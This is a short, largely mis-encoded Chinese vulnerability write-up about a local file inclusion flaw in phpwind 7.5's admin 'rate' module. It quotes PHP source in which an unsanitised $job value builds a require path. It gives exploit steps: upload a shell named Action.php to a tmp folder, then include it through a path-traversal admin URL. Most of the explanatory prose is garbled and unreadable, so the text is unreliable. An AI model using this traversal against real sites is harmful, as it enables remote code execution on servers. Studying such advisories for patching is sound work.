Phpwind7.5̨© 

phpwind̨ذ©

©飺

ļhack\rate\admin.php
Դ룺

<?php
!function_exists(''readover'') && exit(''Forbidden'');
define ( "H_R", R_P . "hack/rate/" );
define ( "L_R", R_P . "lib/" );
InitGP ( array (''ajax'' ) );
$action = strtolower ( ($job) ? $job : "admin" );
$filepath = H_R . "action/" . $action . "Action.php";

(! file_exists ( $filepath )) && exit ();

if ($job != "ajax") {
    require H_R . ''/template/layout.php'';
} else {
    require_once $filepath;
}

?> 
ٿhack\rate\template\layout.php

<?php
!function_exists(''readover'') && exit(''Forbidden'');
include_once PrintEot ( ''left'' );
print <<<EOT
-->
EOT;
require_once $filepath;
include_once PrintEot ( ''adminbottom'' );
?> 
$jobԶ壬ذֻaddslashesˣ˲ͨ%00ضϣͨ///////ضϣֱtmpļдshell岻˵ˣð취

©ԣ

tmpϴһshellΪAction.php
Ȼʣhttp://127.0.0.1/pw/admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/
